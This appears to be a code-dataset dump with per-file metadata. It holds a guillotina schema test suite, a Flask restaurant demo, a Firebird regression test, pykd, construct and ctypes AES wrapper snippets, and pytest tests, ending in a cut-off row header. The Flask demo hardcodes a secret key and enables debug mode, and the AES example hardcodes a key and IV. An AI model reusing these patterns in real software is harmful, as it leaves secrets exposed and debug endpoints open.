self.assertEqual(field.order, order_after)
def test_explicit_required_readonly_missingValue(self):
obj = object()
field = self._makeOne(required=False, readonly=True, missing_value=obj)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(field.missing_value, obj)
def test_explicit_constraint_default(self):
_called_with = []
obj = object()
def _constraint(value):
_called_with.append(value)
return value is obj
field = self._makeOne(
required=False, readonly=True, constraint=_constraint, default=obj
)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(_called_with, [obj])
self.assertEqual(field.constraint(self), False)
self.assertEqual(_called_with, [obj, self])
self.assertEqual(field.default, obj)
def test_explicit_defaultFactory(self):
_called_with = []
obj = object()
def _constraint(value):
_called_with.append(value)
return value is obj
def _factory():
return obj
field = self._makeOne(
required=False,
readonly=True,
constraint=_constraint,
defaultFactory=_factory,
)
self.assertEqual(field.required, False)
self.assertEqual(field.readonly, True)
self.assertEqual(field.constraint(self), False)
self.assertEqual(_called_with, [self])
self.assertEqual(field.default, obj)
self.assertEqual(_called_with, [self, obj])
self.assertEqual(field.defaultFactory, _factory)
def test_explicit_defaultFactory_returning_missing_value(self):
def _factory():
return None
field = self._makeOne(required=True,
defaultFactory=_factory)
self.assertEqual(field.default, None)
def test_bind(self):
obj = object()
field = self._makeOne()
bound = field.bind(obj)
self.assertEqual(bound.context, obj)
expected = dict(field.__dict__)
found = dict(bound.__dict__)
found.pop('context')
self.assertEqual(found, expected)
self.assertEqual(bound.__class__, field.__class__)
def test_validate_missing_not_required(self):
missing = object()
def _fail(value):
return False
field = self._makeOne(
required=False, missing_value=missing, constraint=_fail,
)
self.assertEqual(field.validate(missing), None) # doesn't raise
def test_validate_missing_and_required(self):
from guillotina.schema.exceptions import RequiredMissing
missing = object()
def _fail(value):
return False
field = self._makeOne(
required=True, missing_value=missing, constraint=_fail,
)
self.assertRaises(RequiredMissing, field.validate, missing)
def test_validate_wrong_type(self):
from guillotina.schema.exceptions import WrongType
def _fail(value):
return False
field = self._makeOne(required=True, constraint=_fail)
field._type = str
self.assertRaises(WrongType, field.validate, 1)
def test_validate_constraint_fails(self):
from guillotina.schema.exceptions import ConstraintNotSatisfied
def _fail(value):
return False
field = self._makeOne(required=True, constraint=_fail)
field._type = int
self.assertRaises(ConstraintNotSatisfied, field.validate, 1)
def test_validate_constraint_raises_StopValidation(self):
from guillotina.schema.exceptions import StopValidation
def _fail(value):
raise StopValidation
field = self._makeOne(required=True, constraint=_fail)
field._type = int
field.validate(1) # doesn't raise
def test___eq___different_type(self):
left = self._makeOne()
class Derived(self._getTargetClass()):
pass
right = Derived()
self.assertEqual(left == right, False)
self.assertEqual(left != right, True)
def test___eq___same_type_different_attrs(self):
left = self._makeOne(required=True)
right = self._makeOne(required=False)
self.assertEqual(left == right, False)
self.assertEqual(left != right, True)
def test___eq___same_type_same_attrs(self):
left = self._makeOne()
right = self._makeOne()
self.assertEqual(left == right, True)
self.assertEqual(left != right, False)
def test_get_miss(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertRaises(AttributeError, field.get, inst)
def test_get_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'EXTANT'
self.assertEqual(field.get(inst), 'EXTANT')
def test_query_miss_no_default(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertEqual(field.query(inst), None)
def test_query_miss_w_default(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertEqual(field.query(inst, 'DEFAULT'), 'DEFAULT')
def test_query_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'EXTANT'
self.assertEqual(field.query(inst), 'EXTANT')
def test_set_readonly(self):
field = self._makeOne(__name__='lirame', readonly=True)
inst = DummyInst()
self.assertRaises(TypeError, field.set, inst, 'VALUE')
def test_set_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'BEFORE'
field.set(inst, 'AFTER')
self.assertEqual(inst.extant, 'AFTER')
class ContainerTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Container
return Container
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
self.assertRaises(RequiredMissing, field.validate, None)
def test__validate_not_collection_not_iterable(self):
from guillotina.schema.exceptions import NotAContainer
cont = self._makeOne()
self.assertRaises(NotAContainer, cont._validate, object())
def test__validate_collection_but_not_iterable(self):
cont = self._makeOne()
class Dummy(object):
def __contains__(self, item):
return False
cont._validate(Dummy()) # doesn't raise
def test__validate_not_collection_but_iterable(self):
cont = self._makeOne()
class Dummy(object):
def __iter__(self):
return iter(())
cont._validate(Dummy()) # doesn't raise
def test__validate_w_collections(self):
cont = self._makeOne()
cont._validate(()) # doesn't raise
cont._validate([]) # doesn't raise
cont._validate('') # doesn't raise
cont._validate({}) # doesn't raise
class IterableTests(ContainerTests):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Iterable
return Iterable
def test__validate_collection_but_not_iterable(self):
from guillotina.schema.exceptions import NotAnIterator
itr = self._makeOne()
class Dummy(object):
def __contains__(self, item):
return False
self.assertRaises(NotAnIterator, itr._validate, Dummy())
class OrderableTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Orderable
return Orderable
def _makeOne(self, *args, **kw):
# Orderable is a mixin for a type derived from Field
from guillotina.schema._bootstrapfields import Field
class Mixed(self._getTargetClass(), Field):
pass
return Mixed(*args, **kw)
def test_ctor_defaults(self):
ordb = self._makeOne()
self.assertEqual(ordb.min, None)
self.assertEqual(ordb.max, None)
self.assertEqual(ordb.default, None)
def test_ctor_default_too_small(self):
# This test exercises _validate, too
from guillotina.schema.exceptions import TooSmall
self.assertRaises(TooSmall, self._makeOne, min=0, default=-1)
def test_ctor_default_too_large(self):
# This test exercises _validate, too
from guillotina.schema.exceptions import TooBig
self.assertRaises(TooBig, self._makeOne, max=10, default=11)
class MinMaxLenTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import MinMaxLen
return MinMaxLen
def _makeOne(self, *args, **kw):
# MinMaxLen is a mixin for a type derived from Field
from guillotina.schema._bootstrapfields import Field
class Mixed(self._getTargetClass(), Field):
pass
return Mixed(*args, **kw)
def test_ctor_defaults(self):
mml = self._makeOne()
self.assertEqual(mml.min_length, 0)
self.assertEqual(mml.max_length, None)
def test_validate_too_short(self):
from guillotina.schema.exceptions import TooShort
mml = self._makeOne(min_length=1)
self.assertRaises(TooShort, mml._validate, ())
def test_validate_too_long(self):
from guillotina.schema.exceptions import TooLong
mml = self._makeOne(max_length=2)
self.assertRaises(TooLong, mml._validate, (0, 1, 2))
class TextTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Text
return Text
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, str)
def test_validate_wrong_types(self):
from guillotina.schema.exceptions import WrongType
field = self._makeOne()
self.assertRaises(WrongType, field.validate, b'')
self.assertRaises(WrongType, field.validate, 1)
self.assertRaises(WrongType, field.validate, 1.0)
self.assertRaises(WrongType, field.validate, ())
self.assertRaises(WrongType, field.validate, [])
self.assertRaises(WrongType, field.validate, {})
self.assertRaises(WrongType, field.validate, set())
self.assertRaises(WrongType, field.validate, frozenset())
self.assertRaises(WrongType, field.validate, object())
def test_validate_w_invalid_default(self):
from guillotina.schema.exceptions import ValidationError
self.assertRaises(ValidationError, self._makeOne, default=b'')
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate('abc\ndef')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
field.validate('abc\ndef')
self.assertRaises(RequiredMissing, field.validate, None)
def test_from_unicode_miss(self):
from guillotina.schema.exceptions import WrongType
deadbeef = b'DEADBEEF'
txt = self._makeOne()
self.assertRaises(WrongType, txt.from_unicode, deadbeef)
def test_from_unicode_hit(self):
deadbeef = 'DEADBEEF'
txt = self._makeOne()
self.assertEqual(txt.from_unicode(deadbeef), deadbeef)
class TextLineTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._field import TextLine
return TextLine
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_class_conforms_to_ITextLine(self):
from zope.interface.verify import verifyClass
from guillotina.schema.interfaces import ITextLine
verifyClass(ITextLine, self._getTargetClass())
def test_instance_conforms_to_ITextLine(self):
from zope.interface.verify import verifyObject
from guillotina.schema.interfaces import ITextLine
verifyObject(ITextLine, self._makeOne())
def test_validate_wrong_types(self):
from guillotina.schema.exceptions import WrongType
field = self._makeOne()
self.assertRaises(WrongType, field.validate, b'')
self.assertRaises(WrongType, field.validate, 1)
self.assertRaises(WrongType, field.validate, 1.0)
self.assertRaises(WrongType, field.validate, ())
self.assertRaises(WrongType, field.validate, [])
self.assertRaises(WrongType, field.validate, {})
self.assertRaises(WrongType, field.validate, set())
self.assertRaises(WrongType, field.validate, frozenset())
self.assertRaises(WrongType, field.validate, object())
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
self.assertRaises(RequiredMissing, field.validate, None)
def test_constraint(self):
field = self._makeOne()
self.assertEqual(field.constraint(''), True)
self.assertEqual(field.constraint('abc'), True)
self.assertEqual(field.constraint('abc\ndef'), False)
class PasswordTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Password
return Password
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_set_unchanged(self):
klass = self._getTargetClass()
pw = self._makeOne()
inst = DummyInst()
before = dict(inst.__dict__)
pw.set(inst, klass.UNCHANGED_PASSWORD) # doesn't raise, doesn't write
after = dict(inst.__dict__)
self.assertEqual(after, before)
def test_set_normal(self):
pw = self._makeOne(__name__='password')
inst = DummyInst()
pw.set(inst, 'PASSWORD')
self.assertEqual(inst.password, 'PASSWORD')
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
self.assertRaises(RequiredMissing, field.validate, None)
def test_validate_unchanged_not_already_set(self):
from guillotina.schema.exceptions import WrongType
klass = self._getTargetClass()
inst = DummyInst()
pw = self._makeOne(__name__='password').bind(inst)
self.assertRaises(WrongType,
pw.validate, klass.UNCHANGED_PASSWORD)
def test_validate_unchanged_already_set(self):
klass = self._getTargetClass()
inst = DummyInst()
inst.password = 'foobar'
pw = self._makeOne(__name__='password').bind(inst)
pw.validate(klass.UNCHANGED_PASSWORD) # doesn't raise
def test_constraint(self):
field = self._makeOne()
self.assertEqual(field.constraint(''), True)
self.assertEqual(field.constraint('abc'), True)
self.assertEqual(field.constraint('abc\ndef'), False)
class BoolTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Bool
return Bool
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, bool)
def test__validate_w_int(self):
boo = self._makeOne()
boo._validate(0) # doesn't raise
boo._validate(1) # doesn't raise
def test_set_w_int(self):
boo = self._makeOne(__name__='boo')
inst = DummyInst()
boo.set(inst, 0)
self.assertEqual(inst.boo, False)
boo.set(inst, 1)
self.assertEqual(inst.boo, True)
def test_from_unicode_miss(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode(''), False)
self.assertEqual(txt.from_unicode('0'), False)
self.assertEqual(txt.from_unicode('1'), False)
self.assertEqual(txt.from_unicode('False'), False)
self.assertEqual(txt.from_unicode('false'), False)
def test_from_unicode_hit(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode('True'), True)
self.assertEqual(txt.from_unicode('true'), True)
class IntTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Int
return Int
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, int)
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate(None)
field.validate(10)
field.validate(0)
field.validate(-1)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate(10)
field.validate(0)
field.validate(-1)
self.assertRaises(RequiredMissing, field.validate, None)
def test_validate_min(self):
from guillotina.schema.exceptions import TooSmall
field = self._makeOne(min=10)
field.validate(10)
field.validate(20)
self.assertRaises(TooSmall, field.validate, 9)
self.assertRaises(TooSmall, field.validate, -10)
def test_validate_max(self):
from guillotina.schema.exceptions import TooBig
field = self._makeOne(max=10)
field.validate(5)
field.validate(9)
field.validate(10)
self.assertRaises(TooBig, field.validate, 11)
self.assertRaises(TooBig, field.validate, 20)
def test_validate_min_and_max(self):
from guillotina.schema.exceptions import TooBig
from guillotina.schema.exceptions import TooSmall
field = self._makeOne(min=0, max=10)
field.validate(0)
field.validate(5)
field.validate(10)
self.assertRaises(TooSmall, field.validate, -10)
self.assertRaises(TooSmall, field.validate, -1)
self.assertRaises(TooBig, field.validate, 11)
self.assertRaises(TooBig, field.validate, 20)
def test_from_unicode_miss(self):
txt = self._makeOne()
self.assertRaises(ValueError, txt.from_unicode, '')
self.assertRaises(ValueError, txt.from_unicode, 'False')
self.assertRaises(ValueError, txt.from_unicode, 'True')
def test_from_unicode_hit(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode('0'), 0)
self.assertEqual(txt.from_unicode('1'), 1)
self.assertEqual(txt.from_unicode('-1'), -1)
class DummyInst(object):
missing_value = object()
def __init__(self, exc=None):
self._exc = exc
def validate(self, value):
if self._exc is not None:
raise self._exc()
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(ValidatedPropertyTests),
unittest.makeSuite(DefaultPropertyTests),
unittest.makeSuite(FieldTests),
unittest.makeSuite(ContainerTests),
unittest.makeSuite(IterableTests),
unittest.makeSuite(OrderableTests),
unittest.makeSuite(MinMaxLenTests),
unittest.makeSuite(TextTests),
unittest.makeSuite(TextLineTests),
unittest.makeSuite(PasswordTests),
unittest.makeSuite(BoolTests),
unittest.makeSuite(IntTests),
))
| 33.902622 | 79 | 0.647739 | 25,872 | 0.952718 | 0 | 0 | 0 | 0 | 0 | 0 | 1,663 | 0.061239 |
ac8b7c1d0b88747e30dd4b04da5a9e3ae9540f10 | 2,410 | py | Python | project.py | pedroalvesfilho/rest_flask_render0 | 81b7e1e865d083718a60e5ec38a0ca8f889e14f8 | ["MIT"] | null | null | null | project.py | pedroalvesfilho/rest_flask_render0 | 81b7e1e865d083718a60e5ec38a0ca8f889e14f8 | ["MIT"] | null | null | null | project.py | pedroalvesfilho/rest_flask_render0 | 81b7e1e865d083718a60e5ec38a0ca8f889e14f8 | ["MIT"] | null | null | null |
#!/usr/bin/env python
from flask import Flask
from flask import render_template, request
app = Flask(__name__)
"""
# https://www.pluralsight.com/guides/manipulating-lists-dictionaries-python
# A list is a mutable, ordered sequence of items.
# list = ['a', 'b', 'c']
# list[0]
# A dictionary is a mutable, unordered set of key-value pairs where each key must be unique.
# dictionary = {}
# In Python, a dictionary is an unordered collection of items. For example:
# dictionary = {'key' : 'value', 'key_2': 'value_2'}
# dictionary['key']
"""
# Fake restaurants
restaurants = [ # Start a list `[...]` with dictionaries `{...}` inside
{'name': 'The CRUDdy Crab'}, # 'index': '0'
{'name': 'Blue Burger'}, # 'index': '1'
    {'name': 'Taco Hut'}        # 'index': '2'
]
# >>> print(restaurants)
# [{'name': 'The CRUDdy Crab'}, {'name': 'Blue Burger'}, {'name': 'Taco Hut'}]
# >>>
# >>> print(restaurants[0])
# {'name': 'The CRUDdy Crab'}
# >>>
# >>> print(restaurants[0]['name'])
# The CRUDdy Crab
# >>>
# Fake Menu Items
items = [
{'name': 'Cheese Pizza', 'description': 'made with fresh cheese',
'price': '$5.59', 'course': 'Entree'}, # 'index': '0'
{'name': 'Cheese Pizza2', 'description': 'made with fresh cheese2',
'price': '$6.59', 'course': 'Entree2'}, # 'index': '1'
{'name': 'Cheese Pizza3', 'description': 'made with fresh cheese3',
'price': '$7.59', 'course': 'Entree3'}, # 'index': '2'
{'name': 'Cheese Pizza4', 'description': 'made with fresh cheese4',
'price': '$8.59', 'course': 'Entree4'}, # 'index': '3'
]
@app.route('/restaurant/')
@app.route('/')
def showRestaurant():
# RESTAURANT HOME PAGE
return render_template('restaurant.html', restaurantx = restaurants)
@app.route('/restaurant/<int:restid>/edit/<string:restname>', methods=['GET','POST'])
def editRestaurant(restid, restname):
# EDIT RESTAURANT
# https://hackersandslackers.com/flask-routes/
if request.method == 'POST':
restname = request.form.get('name')
restid = request.form.get('id')
restid0 = int(restid)
restaurants[restid0]['name'] = restname
return render_template('editrestaurant.html', restid = restid, restname = restname)
if __name__ == '__main__':
app.secret_key = 'super_secret_key'
app.debug = True
app.run(host='localhost', port=5000)
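# Hypothetical client-side check (assumes the dev server above is running and the
# `requests` package is installed): it posts the form fields that editRestaurant()
# reads from request.form, renaming the restaurant at index 1.
#
#   import requests
#   requests.post("http://localhost:5000/restaurant/1/edit/Blue%20Burger",
#                 data={"name": "Blue Burger Deluxe", "id": "1"})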
| 33.472222 | 92 | 0.607469 | 0 | 0 | 0 | 0 | 643 | 0.266805 | 0 | 0 | 1,540 | 0.639004 |
ac8b7fc77b1b29feaa2f6078b42fbbccbd054d3d | 1,971 | py | Python | tests/bugs/core_1894_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | ["MIT"] | 1 | 2022-02-05T11:37:13.000Z | 2022-02-05T11:37:13.000Z | tests/bugs/core_1894_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | ["MIT"] | 1 | 2021-09-03T11:47:00.000Z | 2021-09-03T12:42:10.000Z | tests/bugs/core_1894_test.py | FirebirdSQL/firebird-qa | 96af2def7f905a06f178e2a80a2c8be4a4b44782 | ["MIT"] | 1 | 2021-06-30T14:14:16.000Z | 2021-06-30T14:14:16.000Z |
#coding:utf-8
#
# id: bugs.core_1894
# title: Circular dependencies between computed fields crashes the engine
# decription:
# Checked on LI-T4.0.0.419 after commit 19.10.2016 18:26
# https://github.com/FirebirdSQL/firebird/commit/6a00b3aee6ba17b2f80a5b00def728023e347707
# -- all OK.
#
# tracker_id: CORE-1894
# min_versions: ['3.0.2']
# versions: 3.0.2
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0.2
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table t (
n integer,
n1 computed by (n),
n2 computed by (n1)
);
recreate table t2 (
n integer,
c1 computed by (1),
c2 computed by (c1)
);
alter table t alter n1 computed by (n2);
commit;
set autoddl off;
alter table t2 drop c1;
alter table t2 add c1 computed by (c2);
commit;
select * from t;
select * from t2; -- THIS LEAD SERVER CRASH (checked on WI-T4.0.0.399)
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stderr_1 = """
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-Cannot have circular dependencies with computed fields
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-cannot delete
-COLUMN T2.C1
-there are 1 dependencies
Statement failed, SQLSTATE = 42000
Cannot have circular dependencies with computed fields
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-cannot delete
-COLUMN T2.C1
-there are 1 dependencies
"""
@pytest.mark.version('>=3.0.2')
def test_1(act_1: Action):
act_1.expected_stderr = expected_stderr_1
act_1.execute()
assert act_1.clean_stderr == act_1.clean_expected_stderr
| 24.036585 | 106 | 0.650431 | 0 | 0 | 0 | 0 | 185 | 0.093861 | 0 | 0 | 1,508 | 0.765094 |
3ba2a6cd1ef7931310fdf480d5b0bc1594f43a55 | 1,296 | py | Python | lib/pykdlib/modules.py | bin601/pkyd | 2b60c0ebd81e9e3e29f88ea60691d5c403df2160 | ["MIT"] | 1 | 2020-05-31T20:11:03.000Z | 2020-05-31T20:11:03.000Z | lib/pykdlib/modules.py | bin601/pykd | 2b60c0ebd81e9e3e29f88ea60691d5c403df2160 | ["MIT"] | null | null | null | lib/pykdlib/modules.py | bin601/pykd | 2b60c0ebd81e9e3e29f88ea60691d5c403df2160 | ["MIT"] | 1 | 2020-11-13T11:12:47.000Z | 2020-11-13T11:12:47.000Z |
#
# Modules Info
#
import pykd
moduleList = []
def reloadModules():
global moduleList
for m in moduleList: globals()[ m.name().lower() ] = None
if pykd.isKernelDebugging():
global nt
nt = pykd.loadModule("nt")
modules = pykd.typedVarList( nt.PsLoadedModuleList, "nt", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList.append( nt )
else:
ntdll = pykd.loadModule("ntdll")
peb = pykd.typedVar( "ntdll", "_PEB", pykd.getCurrentProcess() )
ldr = pykd.typedVar( "ntdll", "_PEB_LDR_DATA", peb.Ldr )
modules = pykd.typedVarList( ldr.InLoadOrderModuleList.getAddress(), "ntdll", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList = []
for m in modules:
baseName = str( pykd.loadUnicodeString( m.BaseDllName.getAddress() ) )
if baseName=="ntoskrnl.exe":
continue
module = pykd.findModule( m.DllBase )
globals()[ module.name().lower() ] = module
moduleList.append( module )
def printModuleList():
pykd.dprintln( "\n".join( [ str(m) for m in moduleList ] ) )
reloadModules()
| 17.28 | 133 | 0.549383 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 177 | 0.136574 |
3ba3da7e08c14ac9df758e9e45e7cb972fc56eb2 | 139 | py | Python | compiled/construct/repeat_eos_u4.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | ["MIT"] | 4 | 2017-04-08T12:55:11.000Z | 2020-12-05T21:09:31.000Z | compiled/construct/repeat_eos_u4.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | ["MIT"] | 7 | 2018-04-23T01:30:33.000Z | 2020-10-30T23:56:14.000Z | compiled/construct/repeat_eos_u4.py | smarek/ci_targets | c5edee7b0901fd8e7f75f85245ea4209b38e0cb3 | ["MIT"] | 6 | 2017-04-08T11:41:14.000Z | 2020-10-30T22:47:31.000Z |
from construct import *
from construct.lib import *
repeat_eos_u4 = Struct(
'numbers' / GreedyRange(Int32ul),
)
_schema = repeat_eos_u4
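# A minimal round-trip sketch using the construct API: GreedyRange(Int32ul) keeps
# consuming little-endian uint32 values until the end of the stream.
if __name__ == '__main__':
    data = bytes.fromhex("0100000002000000")            # two uint32 values: 1 and 2
    parsed = repeat_eos_u4.parse(data)
    print(parsed.numbers)                               # the two parsed values: 1 and 2
    assert repeat_eos_u4.build({'numbers': [1, 2]}) == data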
| 15.444444 | 34 | 0.755396 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 | 0.064748 |
3ba72f829fd19f1024caa6c030fe4b09746f7a00 | 2,981 | py | Python | Python/simpleencrypt/aes256.py | shreyasnayak/SimpleEncrypt | 32223ee7a52baf186c53ac065cb61e9a32e4d20f | ["MIT"] | null | null | null | Python/simpleencrypt/aes256.py | shreyasnayak/SimpleEncrypt | 32223ee7a52baf186c53ac065cb61e9a32e4d20f | ["MIT"] | null | null | null | Python/simpleencrypt/aes256.py | shreyasnayak/SimpleEncrypt | 32223ee7a52baf186c53ac065cb61e9a32e4d20f | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
# aes256.py
# This file is part of SimpleEncrypt project (https://github.com/shreyasnayak/SimpleEncrypt)
#
# Copyright Shreyas Nayak (c) 2021-2022 <shreyasnayak21@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__author__ = "Shreyas Nayak"
__email__ = "shreyasnayak21@gmail.com"
__copyright__ = "Copyright 2021-2022 Shreyas Nayak"
__license__ = "MIT"
from ctypes import *
CDLL("libcrypto.so.1.1", mode = RTLD_GLOBAL)
CDLL("libssl.so.1.1", mode = RTLD_GLOBAL)
lib = cdll.LoadLibrary('/usr/local/lib/libSimpleEncrypt.so')
lib.freeme.argtypes = c_void_p,
lib.freeme.restype = None
lib.encryptMessage.argtypes = [c_char_p,c_char_p,c_char_p]
lib.encryptMessage.restype = c_void_p
lib.decryptMessage.argtypes = [c_char_p,c_char_p,c_char_p]
lib.decryptMessage.restype = c_void_p
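# Note (explanatory comment, not part of the original library contract): both C calls
# return a pointer to a C-allocated string, so the result is first copied out with
# cast(..., c_char_p).value and the buffer is then released with lib.freeme() below,
# which avoids leaking memory allocated inside libSimpleEncrypt.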
def encrypt(plainText,key,iv):
"""
Encrypt text with the initiation vector and key
@param plainText: string Text to encrypt
@param key: string key
@param iv: string initiation vector
@type plainText: string
@type key: string
@type iv: string
@rtype: string
"""
en_ptr = lib.encryptMessage(c_char_p(plainText),c_char_p(key),c_char_p(iv))
value = cast(en_ptr, c_char_p).value
lib.freeme(en_ptr)
return value
def decrypt(ciphertext,key,iv):
"""
Encrypt text with the initiation vector and key
@param ciphertext: string ciphertext to decrypt
@param key: string key
@param iv: string initiation vector
@type ciphertext: string
@type key: string
@type iv: string
@rtype: string
"""
de_ptr = lib.decryptMessage(c_char_p(ciphertext),c_char_p(key),c_char_p(iv))
value = cast(de_ptr, c_char_p).value
lib.freeme(de_ptr)
return value
if __name__ == '__main__':
iv = b'171A065A7675A09AECEC118DBC008A822A041FC2EBF2B3E4CF7A4C966E5D5897'
key = b'2B5442AD8739992F'
plainText = b'TEXT'
print(decrypt(encrypt(plainText,key, iv),key,iv))
| 36.353659
| 92
| 0.739349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,023
| 0.678631
|
3ba741e941c63d039ed8b54e0f39f036cca0c01c
| 1,735
|
py
|
Python
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 12
|
2021-08-01T09:41:24.000Z
|
2021-12-03T02:53:10.000Z
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 5
|
2021-09-11T16:51:01.000Z
|
2022-02-18T16:20:29.000Z
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 2
|
2021-08-03T16:02:27.000Z
|
2021-08-06T07:51:54.000Z
|
"""Test module for the Error dialog widget."""
import os
import logging
import pytest
from PySide2.QtGui import QClipboard
from src.widgets import error_dialog
from src.about import about_to_string
@pytest.fixture()
def error_log_path(_package):
"""Get the log directory path."""
yield os.path.join(_package, 'src', 'log', 'errors.log')
@pytest.fixture(name='report')
def create_report(qtbot, error_log_path):
"""Initialize the ErrorDialog class and create an error report.
    After the tests, the errors.log file is cleaned.
Yields:
Report: a namedtuple with the link and the port attributes.
"""
widget = error_dialog.ErrorDialog('Test Error')
qtbot.addWidget(widget)
yield widget.prepare_report()
with open(error_log_path, 'w') as _:
pass
def test_report_return_value(report):
"""Check if prepare report return is a tuple."""
assert isinstance(report, tuple)
def test_prepare_report_link(report):
"""Check if error dialog returns the issues link when clicking Report."""
assert report.link == 'https://github.com/sisoe24/NukeServerSocket/issues'
def test_prepare_report_clipboard(report):
"""Check if report gets copied into clipboard."""
assert 'NukeServerSocket' in QClipboard().text()
def test_prepare_report_file(report, error_log_path):
"""Check if the report file has the about to string information."""
with open(error_log_path) as file:
assert about_to_string() in file.read()
def test_get_critical_logger():
"""Check if method returns the critical logger file handler."""
logger = error_dialog._get_critical_logger()
assert logger.name == 'Critical'
assert isinstance(logger, logging.FileHandler)
| 27.539683
| 78
| 0.725648
| 0
| 0
| 546
| 0.314697
| 595
| 0.342939
| 0
| 0
| 706
| 0.406916
|
3ba791283dc54edfe51e5015658bbc050291ab63
| 3,854
|
py
|
Python
|
DataStructure/Table/HashTable.py
|
zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | 27
|
2021-04-21T08:17:25.000Z
|
2021-06-30T07:04:49.000Z
|
DataStructure/Table/HashTable.py
|
zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | null | null | null |
DataStructure/Table/HashTable.py
|
